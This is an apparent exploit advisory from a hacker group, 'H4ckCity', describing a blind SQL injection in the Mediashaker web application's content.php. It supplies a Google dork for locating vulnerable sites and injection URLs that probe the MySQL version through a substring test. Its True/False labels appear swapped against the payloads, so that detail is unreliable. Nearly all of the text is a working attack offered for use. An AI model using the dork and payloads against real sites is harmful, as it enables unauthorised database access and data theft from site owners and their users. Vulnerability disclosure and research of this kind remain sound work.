############################################################################
# Exploit Title: Mediashaker Blind SQL Injection Vulnerabilitiy
# Google Dork: inurl:content.php "Powered by Mediashaker"
# Date: 4/1/2012
# Author: H4ckCity Security Team
# Discovered By: farbodmahini
# Home: WwW.H4ckCity.Org
# Version: All Version
# Category:: webapps
# Security Risk:: High
# Vendor: http://www.mediashaker.com/
# Tested on: GNU/Linux Ubuntu - Windows Server - win7
############################################################################
# Exploit:
#
#
# http://www.target.com/content.php?id=1 [Blind SQL]
#
#
# Test Blind SQL Injection in MYSQL Version 5:
#
#
# False
#
# http://www.target.com/content.php?id=1 and substring(@@version,1,1)=5--
#
# True
#
# http://www.target.com/content.php?id=1 and substring(@@version,1,1)=4--
#
#
#
############################################################################
# Special Thanks : Mehdi.H4ckcity-2MzRp-Mikili-M.Prince-Bl4ck.Viper-iC0d3R-
# IrIsT-K0242-P0W3RFU7-Mr.M4st3r-Higher_Sense ,...
############################################################################
GreetZ : All H4ckCity Member - BHG Members
############################################################################